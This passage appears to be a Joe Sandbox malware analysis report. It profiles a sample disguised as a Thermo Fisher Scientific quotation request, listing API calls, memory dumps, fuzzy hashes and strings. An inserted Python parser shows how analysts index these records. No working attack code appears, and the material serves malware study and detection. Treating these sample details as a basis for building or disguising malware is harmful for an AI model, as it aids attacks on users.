                                                              • Associated: 00000000.00000002.2063243986.000000000068D000.00000002.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.2063243986.00000000006AE000.00000002.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.2063285271.00000000006BA000.00000004.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.2063304464.00000000006C4000.00000002.00000001.01000000.00000003.sdmp
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_600000_Thermo Fisher Scientific - Aj#U00e1nlatk#U00e9r#U00e9s.jbxd
                                                              Similarity
                                                              • API ID: ColorLongWindow
                                                              • String ID:
                                                              • API String ID: 259745315-0
                                                              • Opcode ID: 0ced5e80d0de6511e676f20441567e3b3e607e1563d9353684157f46e70d8d77
                                                              • Instruction ID: db002c5b72a21db067a8c0ed7ee3841e2a6dcfe310bd2a797f8bdf4dfef62c90
                                                              • Opcode Fuzzy Hash: 0ced5e80d0de6511e676f20441567e3b3e607e1563d9353684157f46e70d8d77
                                                              • Instruction Fuzzy Hash: 64418330100144ABDF215F68D889BF93BA7AF46731F189355FDA58E2EAD7308C82D761
                                                              APIs
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2063197417.0000000000601000.00000020.00000001.01000000.00000003.sdmp, Offset: 00600000, based on PE: true
                                                               • Associated: 00000000.00000002.2063180078.0000000000600000.00000002.00000001.01000000.00000003.sdmp
                                                               • Associated: 00000000.00000002.2063243986.000000000068D000.00000002.00000001.01000000.00000003.sdmp
                                                               • Associated: 00000000.00000002.2063243986.00000000006AE000.00000002.00000001.01000000.00000003.sdmp
                                                               • Associated: 00000000.00000002.2063285271.00000000006BA000.00000004.00000001.01000000.00000003.sdmp
                                                               • Associated: 00000000.00000002.2063304464.00000000006C4000.00000002.00000001.01000000.00000003.sdmp
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_600000_Thermo Fisher Scientific - Aj#U00e1nlatk#U00e9r#U00e9s.jbxd
                                                              Similarity
                                                              • API ID: _wcscat_wcscpy$__wsplitpath$_wcschr
                                                              • String ID:
                                                              • API String ID: 136442275-0
                                                              • Opcode ID: 40abc59879cf6490e0d524dd95e0d98f7e0592c0b6209e0fbc3cdced73d14238
                                                              • Instruction ID: 7f023e20c6ee37b8456235ff9d9e81636b4b325fb653ee513f4037341c2174f6
                                                              • Opcode Fuzzy Hash: 40abc59879cf6490e0d524dd95e0d98f7e0592c0b6209e0fbc3cdced73d14238
                                                              • Instruction Fuzzy Hash: B2415F7684512CAFDFA1EB90DC85DCB73BEEF44300F0041A6FA59A2041EA30ABE48F55
                                                              APIs
                                                              • CharLowerBuffW.USER32(0069DC00,0069DC00,0069DC00), ref: 0064D7CE
                                                              • GetDriveTypeW.KERNEL32(?,006B3A70,00000061), ref: 0064D898
                                                              • _wcscpy.LIBCMT ref: 0064D8C2
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2063197417.0000000000601000.00000020.00000001.01000000.00000003.sdmp, Offset: 00600000, based on PE: true
                                                               • Associated: 00000000.00000002.2063180078.0000000000600000.00000002.00000001.01000000.00000003.sdmp
                                                               • Associated: 00000000.00000002.2063243986.000000000068D000.00000002.00000001.01000000.00000003.sdmp
                                                               • Associated: 00000000.00000002.2063243986.00000000006AE000.00000002.00000001.01000000.00000003.sdmp
                                                               • Associated: 00000000.00000002.2063285271.00000000006BA000.00000004.00000001.01000000.00000003.sdmp
                                                               • Associated: 00000000.00000002.2063304464.00000000006C4000.00000002.00000001.01000000.00000003.sdmp
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_600000_Thermo Fisher Scientific - Aj#U00e1nlatk#U00e9r#U00e9s.jbxd
                                                              Similarity
                                                              • API ID: BuffCharDriveLowerType_wcscpy
                                                              • String ID: all$cdrom$fixed$network$ramdisk$removable$unknown
                                                              • API String ID: 2820617543-1000479233
                                                              • Opcode ID: d57cb864f80ad05a8fec4eefed81ea596ad26972f5c9bea147bd23c3ba1813e4
                                                              • Instruction ID: be612317751e94ae31b6e9ab062d6eae310f03ad2abf83cabab4749abb906198
                                                              • Opcode Fuzzy Hash: d57cb864f80ad05a8fec4eefed81ea596ad26972f5c9bea147bd23c3ba1813e4
                                                              • Instruction Fuzzy Hash: 6251DF70604201AFC740EF14C891AAFB7A7EF94314F24892DF8AA572A2DB31DD45CB86
                                                              APIs
                                                              • __swprintf.LIBCMT ref: 006093AB
                                                              • __itow.LIBCMT ref: 006093DF
                                                                • Part of subcall function 00621557: _xtow@16.LIBCMT ref: 00621578
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2063197417.0000000000601000.00000020.00000001.01000000.00000003.sdmp, Offset: 00600000, based on PE: true
                                                               • Associated: 00000000.00000002.2063180078.0000000000600000.00000002.00000001.01000000.00000003.sdmp
                                                               • Associated: 00000000.00000002.2063243986.000000000068D000.00000002.00000001.01000000.00000003.sdmp
                                                               • Associated: 00000000.00000002.2063243986.00000000006AE000.00000002.00000001.01000000.00000003.sdmp
                                                               • Associated: 00000000.00000002.2063285271.00000000006BA000.00000004.00000001.01000000.00000003.sdmp
                                                               • Associated: 00000000.00000002.2063304464.00000000006C4000.00000002.00000001.01000000.00000003.sdmp
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_600000_Thermo Fisher Scientific - Aj#U00e1nlatk#U00e9r#U00e9s.jbxd
                                                              Similarity
                                                              • API ID: __itow__swprintf_xtow@16
                                                              • String ID: %.15g$0x%p$False$True
                                                              • API String ID: 1502193981-2263619337
                                                              • Opcode ID: a079126081e0aee420df82c8fd4f4f56657866f0fd0ccfef78c9af84825c5654
                                                              • Instruction ID: 570bbc6ea858be100636be256af923a850a91dba0b7bbd2fbe0a9c0730ab35d6
                                                              • Opcode Fuzzy Hash: a079126081e0aee420df82c8fd4f4f56657866f0fd0ccfef78c9af84825c5654
                                                              • Instruction Fuzzy Hash: DF41D471644614AFDB2CDB74D945EAA73EBEF45300F24846EE149D72D2EB319942CF20
                                                              APIs
                                                              • MoveWindow.USER32(?,?,?,000000FF,000000FF,00000000,?,?,000000FF,000000FF,?,?,static,00000000,00000000,?), ref: 0066A259
                                                              • CreateCompatibleDC.GDI32(00000000), ref: 0066A260
                                                              • SendMessageW.USER32(?,00000173,00000000,00000000), ref: 0066A273
                                                              • SelectObject.GDI32(00000000,00000000), ref: 0066A27B
                                                              • GetPixel.GDI32(00000000,00000000,00000000), ref: 0066A286
                                                              • DeleteDC.GDI32(00000000), ref: 0066A28F
                                                              • GetWindowLongW.USER32(?,000000EC), ref: 0066A299
                                                              • SetLayeredWindowAttributes.USER32(?,00000000,00000000,00000001), ref: 0066A2AD
                                                              • DestroyWindow.USER32(?,?,?,000000FF,000000FF,?,?,static,00000000,00000000,?,?,00000000,00000000,?,?), ref: 0066A2B9
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2063197417.0000000000601000.00000020.00000001.01000000.00000003.sdmp, Offset: 00600000, based on PE: true
                                                               • Associated: 00000000.00000002.2063180078.0000000000600000.00000002.00000001.01000000.00000003.sdmp
                                                               • Associated: 00000000.00000002.2063243986.000000000068D000.00000002.00000001.01000000.00000003.sdmp
                                                               • Associated: 00000000.00000002.2063243986.00000000006AE000.00000002.00000001.01000000.00000003.sdmp
                                                               • Associated: 00000000.00000002.2063285271.00000000006BA000.00000004.00000001.01000000.00000003.sdmp
                                                               • Associated: 00000000.00000002.2063304464.00000000006C4000.00000002.00000001.01000000.00000003.sdmp
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_600000_Thermo Fisher Scientific - Aj#U00e1nlatk#U00e9r#U00e9s.jbxd
                                                              Similarity
                                                              • API ID: Window$AttributesCompatibleCreateDeleteDestroyLayeredLongMessageMoveObjectPixelSelectSend
                                                              • String ID: static
                                                              • API String ID: 2559357485-2160076837
                                                              • Opcode ID: b00a1c2ecbfc0d6eb3428ec953c2d92df48b051c49503db6dc8e21576c754cb0
                                                              • Instruction ID: 57e57f19bce44dd4f9a0dccaf1ea53d078ab0d64ab54a876cd3c5c857b4cce2d
                                                              • Opcode Fuzzy Hash: b00a1c2ecbfc0d6eb3428ec953c2d92df48b051c49503db6dc8e21576c754cb0
                                                              • Instruction Fuzzy Hash: F3316731140218BBDF219FA4DC49FEA3B6AFF0A364F140314FA19A61E0C736D851DBA4
                                                              APIs
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2063197417.0000000000601000.00000020.00000001.01000000.00000003.sdmp, Offset: 00600000, based on PE: true
                                                               • Associated: 00000000.00000002.2063180078.0000000000600000.00000002.00000001.01000000.00000003.sdmp
                                                               • Associated: 00000000.00000002.2063243986.000000000068D000.00000002.00000001.01000000.00000003.sdmp
                                                               • Associated: 00000000.00000002.2063243986.00000000006AE000.00000002.00000001.01000000.00000003.sdmp
                                                               • Associated: 00000000.00000002.2063285271.00000000006BA000.00000004.00000001.01000000.00000003.sdmp
                                                               • Associated: 00000000.00000002.2063304464.00000000006C4000.00000002.00000001.01000000.00000003.sdmp
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_600000_Thermo Fisher Scientific - Aj#U00e1nlatk#U00e9r#U00e9s.jbxd
                                                              Similarity
                                                              • API ID: _wcscpy$CleanupStartup_strcatgethostbynamegethostnameinet_ntoa
                                                              • String ID: 0.0.0.0
                                                              • API String ID: 2620052-3771769585
                                                              • Opcode ID: d8f9bad3340679449b2df777f068a5e28bfdbf05d28726684f772013904ebae6
                                                              • Instruction ID: 8924dd38daa3eb4622463671d62c42139501d030611dc7b938681ce08c9e0f46
                                                              • Opcode Fuzzy Hash: d8f9bad3340679449b2df777f068a5e28bfdbf05d28726684f772013904ebae6
                                                              • Instruction Fuzzy Hash: 59115971504114BFDB64AB70EC4AEDA77BFEF01710F000169F045A2182EF70EE858B65
                                                              APIs
                                                              • _memset.LIBCMT ref: 00625047
                                                                • Part of subcall function 00627C0E: __getptd_noexit.LIBCMT ref: 00627C0E
                                                              • __gmtime64_s.LIBCMT ref: 006250E0
                                                              • __gmtime64_s.LIBCMT ref: 00625116
                                                              • __gmtime64_s.LIBCMT ref: 00625133
                                                              • __allrem.LIBCMT ref: 00625189
                                                              • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 006251A5
                                                              • __allrem.LIBCMT ref: 006251BC
                                                              • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 006251DA
                                                              • __allrem.LIBCMT ref: 006251F1
                                                              • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 0062520F
                                                              • __invoke_watson.LIBCMT ref: 00625280
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2063197417.0000000000601000.00000020.00000001.01000000.00000003.sdmp, Offset: 00600000, based on PE: true
                                                               • Associated: 00000000.00000002.2063180078.0000000000600000.00000002.00000001.01000000.00000003.sdmp
                                                               • Associated: 00000000.00000002.2063243986.000000000068D000.00000002.00000001.01000000.00000003.sdmp
                                                               • Associated: 00000000.00000002.2063243986.00000000006AE000.00000002.00000001.01000000.00000003.sdmp
                                                               • Associated: 00000000.00000002.2063285271.00000000006BA000.00000004.00000001.01000000.00000003.sdmp
                                                               • Associated: 00000000.00000002.2063304464.00000000006C4000.00000002.00000001.01000000.00000003.sdmp
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_600000_Thermo Fisher Scientific - Aj#U00e1nlatk#U00e9r#U00e9s.jbxd
                                                              Similarity
                                                              • API ID: Unothrow_t@std@@@__allrem__ehfuncinfo$??2@__gmtime64_s$__getptd_noexit__invoke_watson_memset
                                                              • String ID:
                                                              • API String ID: 384356119-0
                                                              • Opcode ID: d5e017027a87c5018ad803d53256558374d4b82fb585307daa6d96de3ac92c4c
                                                              • Instruction ID: 2cb07006c08352a51248aa0952a43a0864bcebc10fbbfad9b0eb64005af0667f
                                                              • Opcode Fuzzy Hash: d5e017027a87c5018ad803d53256558374d4b82fb585307daa6d96de3ac92c4c
                                                              • Instruction Fuzzy Hash: 0B71D571A01F27ABE7249E68DC41BAA73AAAF01364F14422DF411DA7C1E770DE408FD4
                                                              APIs
                                                              • _memset.LIBCMT ref: 00644DF8
                                                              • GetMenuItemInfoW.USER32(006C1708,000000FF,00000000,00000030), ref: 00644E59
                                                              • SetMenuItemInfoW.USER32(006C1708,00000004,00000000,00000030), ref: 00644E8F
                                                              • Sleep.KERNEL32(000001F4), ref: 00644EA1
                                                              • GetMenuItemCount.USER32(?), ref: 00644EE5
                                                              • GetMenuItemID.USER32(?,00000000), ref: 00644F01
                                                              • GetMenuItemID.USER32(?,-00000001), ref: 00644F2B
                                                              • GetMenuItemID.USER32(?,?), ref: 00644F70
                                                              • CheckMenuRadioItem.USER32(?,00000000,?,00000000,00000400), ref: 00644FB6
                                                              • GetMenuItemInfoW.USER32(?,000000FF,00000000,00000030), ref: 00644FCA
                                                              • SetMenuItemInfoW.USER32(?,000000FF,00000000,00000030), ref: 00644FEB
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2063197417.0000000000601000.00000020.00000001.01000000.00000003.sdmp, Offset: 00600000, based on PE: true
                                                               • Associated: 00000000.00000002.2063180078.0000000000600000.00000002.00000001.01000000.00000003.sdmp
                                                               • Associated: 00000000.00000002.2063243986.000000000068D000.00000002.00000001.01000000.00000003.sdmp
                                                               • Associated: 00000000.00000002.2063243986.00000000006AE000.00000002.00000001.01000000.00000003.sdmp
                                                               • Associated: 00000000.00000002.2063285271.00000000006BA000.00000004.00000001.01000000.00000003.sdmp
                                                               • Associated: 00000000.00000002.2063304464.00000000006C4000.00000002.00000001.01000000.00000003.sdmp
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_600000_Thermo Fisher Scientific - Aj#U00e1nlatk#U00e9r#U00e9s.jbxd
                                                              Similarity
                                                              • API ID: ItemMenu$Info$CheckCountRadioSleep_memset
                                                              • String ID:
                                                              • API String ID: 4176008265-0
                                                              • Opcode ID: 5e1291e41dd8b641bee90661909b47145059631c398e24e32f42111a75a4dd93
                                                              • Instruction ID: 1df5dd537f5653c2414b10db69e34948946e7905f5f4c4de648ab8815615325a
                                                              • Opcode Fuzzy Hash: 5e1291e41dd8b641bee90661909b47145059631c398e24e32f42111a75a4dd93
                                                              • Instruction Fuzzy Hash: CA619071A00249AFDB51DFA4D885EFE7BBBFB81308F14055AF442A7291DB31AD49CB21
                                                              APIs
                                                              • SendMessageW.USER32(?,0000101F,00000000,00000000), ref: 00669C98
                                                              • SendMessageW.USER32(00000000,?,0000101F,00000000), ref: 00669C9B
                                                              • GetWindowLongW.USER32(?,000000F0), ref: 00669CBF
                                                              • _memset.LIBCMT ref: 00669CD0
                                                              • SendMessageW.USER32(?,00001004,00000000,00000000), ref: 00669CE2
                                                              • SendMessageW.USER32(?,0000104D,00000000,00000007), ref: 00669D5A
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2063197417.0000000000601000.00000020.00000001.01000000.00000003.sdmp, Offset: 00600000, based on PE: true
                                                               • Associated: 00000000.00000002.2063180078.0000000000600000.00000002.00000001.01000000.00000003.sdmp
                                                               • Associated: 00000000.00000002.2063243986.000000000068D000.00000002.00000001.01000000.00000003.sdmp
                                                               • Associated: 00000000.00000002.2063243986.00000000006AE000.00000002.00000001.01000000.00000003.sdmp
                                                               • Associated: 00000000.00000002.2063285271.00000000006BA000.00000004.00000001.01000000.00000003.sdmp
                                                               • Associated: 00000000.00000002.2063304464.00000000006C4000.00000002.00000001.01000000.00000003.sdmp
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_600000_Thermo Fisher Scientific - Aj#U00e1nlatk#U00e9r#U00e9s.jbxd
                                                              Similarity
                                                              • API ID: MessageSend$LongWindow_memset
                                                              • String ID:
                                                              • API String ID: 830647256-0
                                                              • Opcode ID: d3c6b463e7b3112b448eb31edf0ebd957e84f6ccaaca785e39f1f9ee27ebea36
                                                              • Instruction ID: 1c0ec8e10164b1d20446c62ecb5c6b932ea98fca7c323e7a5864584c8ed5debd
                                                              • Opcode Fuzzy Hash: d3c6b463e7b3112b448eb31edf0ebd957e84f6ccaaca785e39f1f9ee27ebea36
                                                              • Instruction Fuzzy Hash: 03616C75A00208AFDB10DFA4CC81EEE77B9EF0A714F144159FA04AB292D770AD42DB60
                                                              APIs
                                                              • SafeArrayAllocDescriptorEx.OLEAUT32(0000000C,00000000,?), ref: 006394FE
                                                              • SafeArrayAllocData.OLEAUT32(?), ref: 00639549
                                                              • VariantInit.OLEAUT32(?), ref: 0063955B
                                                              • SafeArrayAccessData.OLEAUT32(?,?), ref: 0063957B
                                                              • VariantCopy.OLEAUT32(?,?), ref: 006395BE
                                                              • SafeArrayUnaccessData.OLEAUT32(?), ref: 006395D2
                                                              • VariantClear.OLEAUT32(?), ref: 006395E7
                                                              • SafeArrayDestroyData.OLEAUT32(?), ref: 006395F4
                                                              • SafeArrayDestroyDescriptor.OLEAUT32(?), ref: 006395FD
                                                              • VariantClear.OLEAUT32(?), ref: 0063960F
                                                              • SafeArrayDestroyDescriptor.OLEAUT32(?), ref: 0063961A
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2063197417.0000000000601000.00000020.00000001.01000000.00000003.sdmp, Offset: 00600000, based on PE: true
                                                               • Associated: 00000000.00000002.2063180078.0000000000600000.00000002.00000001.01000000.00000003.sdmp
                                                               • Associated: 00000000.00000002.2063243986.000000000068D000.00000002.00000001.01000000.00000003.sdmp
                                                               • Associated: 00000000.00000002.2063243986.00000000006AE000.00000002.00000001.01000000.00000003.sdmp
                                                               • Associated: 00000000.00000002.2063285271.00000000006BA000.00000004.00000001.01000000.00000003.sdmp
                                                               • Associated: 00000000.00000002.2063304464.00000000006C4000.00000002.00000001.01000000.00000003.sdmp
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_600000_Thermo Fisher Scientific - Aj#U00e1nlatk#U00e9r#U00e9s.jbxd
                                                              Similarity
                                                              • API ID: ArraySafe$DataVariant$DescriptorDestroy$AllocClear$AccessCopyInitUnaccess
                                                              • String ID:
                                                              • API String ID: 2706829360-0
                                                              • Opcode ID: d82d33bf0ca84e6be7f457152925d60dfe7d6daf55b6be95db3fcf1760ea82e8
                                                              • Instruction ID: 688d4662fca746c44958a5ae0ef7a23ad39cbaa01af9c0846fe9e8b596510bb9
                                                              • Opcode Fuzzy Hash: d82d33bf0ca84e6be7f457152925d60dfe7d6daf55b6be95db3fcf1760ea82e8
                                                              • Instruction Fuzzy Hash: 9E414E71900219AFDB01EFA4D8849DEBBBAFF08354F008169E542A3251DB71EA85CFB4
                                                              APIs
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2063197417.0000000000601000.00000020.00000001.01000000.00000003.sdmp, Offset: 00600000, based on PE: true
                                                               • Associated: 00000000.00000002.2063180078.0000000000600000.00000002.00000001.01000000.00000003.sdmp
                                                               • Associated: 00000000.00000002.2063243986.000000000068D000.00000002.00000001.01000000.00000003.sdmp
                                                               • Associated: 00000000.00000002.2063243986.00000000006AE000.00000002.00000001.01000000.00000003.sdmp
                                                               • Associated: 00000000.00000002.2063285271.00000000006BA000.00000004.00000001.01000000.00000003.sdmp
                                                               • Associated: 00000000.00000002.2063304464.00000000006C4000.00000002.00000001.01000000.00000003.sdmp
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_600000_Thermo Fisher Scientific - Aj#U00e1nlatk#U00e9r#U00e9s.jbxd
                                                              Similarity
                                                              • API ID: Variant$ClearInit$_memset
                                                              • String ID: Incorrect Object type in FOR..IN loop$Null Object assignment in FOR..IN loop$h?k$|?k
                                                              • API String ID: 2862541840-1975539356
                                                              • Opcode ID: e09f76fa3a8c60583130e7f2a68ec86f744911184f7033f3a31e367f6446b770
                                                              • Instruction ID: e364b4a98bc335f2ea972176724e4f78190a406cc3ef5db60bd558f91565f9d1
                                                              • Opcode Fuzzy Hash: e09f76fa3a8c60583130e7f2a68ec86f744911184f7033f3a31e367f6446b770
                                                              • Instruction Fuzzy Hash: 5291B271A00219ABDF24DFA4CC44FEEBBBAEF45711F109159F905AB281DB709949CFA0
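The function-level blocks above (APIs with call-site refs, then Memory Dump Source, Joe Sandbox IDA Plugin and Similarity fields) are what an analyst pivots on when hunting the same AutoIt runtime or loader function across other samples: the API ID and Instruction Fuzzy Hash are the similarity keys, and the API/String pairs (e.g. GetDriveTypeW beside "cdrom$fixed$network$...") identify which interpreter routine a block is. The parser below is an added example, not Joe Sandbox code and not part of the original report. It assumes the layout exactly as it appears on this page (a block opens with "APIs", key/value lines are bulleted with "•", and the String ID field joins strings with "$"); the sample text is transcribed from three of the entries above, with the snapshot file name shortened, and is constructed input for the example.

```python
"""Parse Joe Sandbox per-function summary blocks (APIs / Strings / Memory Dump Source /
Joe Sandbox IDA Plugin / Similarity) into records that can be searched and pivoted on.
Added example; not Joe Sandbox code and not part of the original report."""
import re
from dataclasses import dataclass, field
from typing import Optional

@dataclass
class ApiCall:
    name: str                          # symbol as printed, e.g. GetDriveTypeW or _wcscpy
    module: str                        # tag after the dot: DLL (KERNEL32) or CRT marker (LIBCMT)
    args: list                         # argument values as printed; '?' means unresolved
    ref: str                           # call-site address in the dumped image
    subcall_of: Optional[str] = None   # set for 'Part of subcall function X' lines

@dataclass
class FunctionRecord:
    apis: list = field(default_factory=list)
    meta: dict = field(default_factory=dict)  # all '• Key: value' fields of the block

    @property
    def strings(self):
        # Assumption: Joe joins the referenced strings of a function with '$' in 'String ID'.
        raw = self.meta.get("String ID", "")
        return raw.split("$") if raw else []

    @property
    def instruction_fuzzy_hash(self):
        return self.meta.get("Instruction Fuzzy Hash")

# '• Name.MODULE(args), ref: ADDR' or '• Name.MODULE ref: ADDR', optionally prefixed by
# 'Part of subcall function ADDR:'; names may contain '$', '?', '@' (CRT decorated names).
API_RE = re.compile(
    r"^\s*•\s*(?:Part of subcall function (?P<sub>[0-9A-Fa-f]+):\s*)?"
    r"(?P<name>\S+?)\.(?P<mod>[A-Z][A-Z0-9_]*)"
    r"(?:\((?P<args>[^)]*)\))?,?\s+ref:\s*(?P<ref>[0-9A-Fa-f]+)\s*$")
KV_RE = re.compile(r"^\s*•\s*(?P<key>[^:]+?):\s*(?P<val>.*)$")
SECTIONS = {"APIs", "Strings", "Memory Dump Source", "Joe Sandbox IDA Plugin", "Similarity"}

def parse_report(text):
    """Split report text into FunctionRecords; every block opens with a bare 'APIs' line."""
    records, current, section = [], None, None
    for line in text.splitlines():
        stripped = line.strip()
        if stripped in SECTIONS:
            if stripped == "APIs":
                current = FunctionRecord()
                records.append(current)
            section = stripped
            continue
        if current is None or not stripped:
            continue
        if section == "APIs":
            m = API_RE.match(line)
            if m:
                args = [a.strip() for a in m["args"].split(",")] if m["args"] else []
                current.apis.append(ApiCall(m["name"], m["mod"], args, m["ref"].upper(), m["sub"]))
        elif section != "Strings":
            m = KV_RE.match(line)
            if m:
                key, val = m["key"].strip(), m["val"].strip()
                if key == "Associated":          # repeated per block: keep every dump listed
                    current.meta.setdefault(key, []).append(val)
                else:
                    current.meta[key] = val
    return records

def functions_calling(records, api_name):
    """Records whose own call list (not a subcall's) contains api_name."""
    return [r for r in records
            if any(c.name == api_name and c.subcall_of is None for c in r.apis)]

def similarity_index(records):
    """Instruction Fuzzy Hash -> API ID: the two fields Joe's similarity search keys on,
    so this is the table to diff against reports of other samples."""
    return {r.instruction_fuzzy_hash: r.meta.get("API ID")
            for r in records if r.instruction_fuzzy_hash}

# Constructed sample, transcribed from three blocks of this report (snapshot name shortened).
SAMPLE = """\
APIs
• CharLowerBuffW.USER32(0069DC00,0069DC00,0069DC00), ref: 0064D7CE
• GetDriveTypeW.KERNEL32(?,006B3A70,00000061), ref: 0064D898
• _wcscpy.LIBCMT ref: 0064D8C2
Strings
Memory Dump Source
• Source File: 00000000.00000002.2063197417.0000000000601000.00000020.00000001.01000000.00000003.sdmp, Offset: 00600000, based on PE: true
• Associated: 00000000.00000002.2063180078.0000000000600000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2063243986.000000000068D000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_600000_sample.jbxd
Similarity
• API ID: BuffCharDriveLowerType_wcscpy
• String ID: all$cdrom$fixed$network$ramdisk$removable$unknown
• API String ID: 2820617543-1000479233
• Instruction Fuzzy Hash: 6251DF70604201AFC740EF14C891AAFB7A7EF94314F24892DF8AA572A2DB31DD45CB86
APIs
• __swprintf.LIBCMT ref: 006093AB
• __itow.LIBCMT ref: 006093DF
  • Part of subcall function 00621557: _xtow@16.LIBCMT ref: 00621578
Strings
Similarity
• API ID: __itow__swprintf_xtow@16
• String ID: %.15g$0x%p$False$True
• API String ID: 1502193981-2263619337
• Instruction Fuzzy Hash: DF41D471644614AFDB2CDB74D945EAA73EBEF45300F24846EE149D72D2EB319942CF20
APIs
• MoveWindow.USER32(?,?,?,000000FF,000000FF,00000000,?,?,000000FF,000000FF,?,?,static,00000000,00000000,?), ref: 0066A259
• SetLayeredWindowAttributes.USER32(?,00000000,00000000,00000001), ref: 0066A2AD
Strings
Similarity
• API ID: Window$AttributesCompatibleCreateDeleteDestroyLayeredLongMessageMoveObjectPixelSelectSend
• String ID: static
• API String ID: 2559357485-2160076837
• Instruction Fuzzy Hash: F3316731140218BBDF219FA4DC49FEA3B6AFF0A364F140314FA19A61E0C736D851DBA4
"""

if __name__ == "__main__":
    recs = parse_report(SAMPLE)
    for r in functions_calling(recs, "GetDriveTypeW"):
        print(r.meta["API ID"], r.strings, r.instruction_fuzzy_hash)
```

Run it against a saved copy of the report text instead of SAMPLE to get one record per function; `similarity_index` over two reports, intersected on its keys, lists the functions both samples share, which for a compiled AutoIt binary is mostly the interpreter runtime and is the part to subtract before looking at what the script itself does.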
                                                              APIs
                                                                • Part of subcall function 0060936C: __swprintf.LIBCMT ref: 006093AB
                                                                • Part of subcall function 0060936C: __itow.LIBCMT ref: 006093DF
                                                              • CoInitialize.OLE32 ref: 0065ADF6
                                                              • CoUninitialize.OLE32 ref: 0065AE01
                                                              • CoCreateInstance.OLE32(?,00000000,00000017,0068D8FC,?), ref: 0065AE61
                                                              • IIDFromString.OLE32(?,?), ref: 0065AED4
                                                              • VariantInit.OLEAUT32(?), ref: 0065AF6E
                                                              • VariantClear.OLEAUT32(?), ref: 0065AFCF
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2063197417.0000000000601000.00000020.00000001.01000000.00000003.sdmp, Offset: 00600000, based on PE: true
                                                              • Associated: 00000000.00000002.2063180078.0000000000600000.00000002.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.2063243986.000000000068D000.00000002.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.2063243986.00000000006AE000.00000002.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.2063285271.00000000006BA000.00000004.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.2063304464.00000000006C4000.00000002.00000001.01000000.00000003.sdmp
                                                              Similarity
                                                              • API ID: Variant$ClearCreateFromInitInitializeInstanceStringUninitialize__itow__swprintf
                                                              • String ID: Failed to create object$Invalid parameter$NULL Pointer assignment
                                                              • API String ID: 834269672-1287834457
                                                              APIs
                                                              • WSAStartup.WSOCK32(00000101,?), ref: 00658168
                                                              • inet_addr.WSOCK32(?,?,?), ref: 006581AD
                                                              • gethostbyname.WSOCK32(?), ref: 006581B9
                                                              • IcmpCreateFile.IPHLPAPI ref: 006581C7
                                                              • IcmpSendEcho.IPHLPAPI(?,?,?,00000005,00000000,?,00000029,00000FA0), ref: 00658237
                                                              • IcmpSendEcho.IPHLPAPI(00000000,00000000,?,00000005,00000000,?,00000029,00000FA0), ref: 0065824D
                                                              • IcmpCloseHandle.IPHLPAPI(00000000), ref: 006582C2
                                                              • WSACleanup.WSOCK32 ref: 006582C8
                                                              Strings
                                                              Similarity
                                                              • API ID: Icmp$EchoSend$CleanupCloseCreateFileHandleStartupgethostbynameinet_addr
                                                              • String ID: Ping
                                                              • API String ID: 1028309954-2246546115
                                                              APIs
                                                              • SetErrorMode.KERNEL32(00000001), ref: 0064E396
                                                              • GetDiskFreeSpaceW.KERNEL32(?,?,?,?,?,00000002,00000001), ref: 0064E40C
                                                              • GetLastError.KERNEL32 ref: 0064E416
                                                              • SetErrorMode.KERNEL32(00000000,READY), ref: 0064E483
                                                              Strings
                                                              Similarity
                                                              • API ID: Error$Mode$DiskFreeLastSpace
                                                              • String ID: INVALID$NOTREADY$READONLY$READY$UNKNOWN
                                                              • API String ID: 4194297153-14809454
                                                              APIs
                                                              • SendMessageW.USER32(?,0000018C,000000FF,00000002), ref: 0063B98C
                                                              • GetDlgCtrlID.USER32 ref: 0063B997
                                                              • GetParent.USER32 ref: 0063B9B3
                                                              • SendMessageW.USER32(00000000,?,00000111,?), ref: 0063B9B6
                                                              • GetDlgCtrlID.USER32(?), ref: 0063B9BF
                                                              • GetParent.USER32(?), ref: 0063B9DB
                                                              • SendMessageW.USER32(00000000,?,?,00000111), ref: 0063B9DE
                                                              Strings
                                                              Similarity
                                                              • API ID: MessageSend$CtrlParent
                                                              • String ID: ComboBox$ListBox
                                                              • API String ID: 1383977212-1403004172
                                                              APIs
                                                              • SendMessageW.USER32(?,00000186,00000002,00000000), ref: 0063BA73
                                                              • GetDlgCtrlID.USER32 ref: 0063BA7E
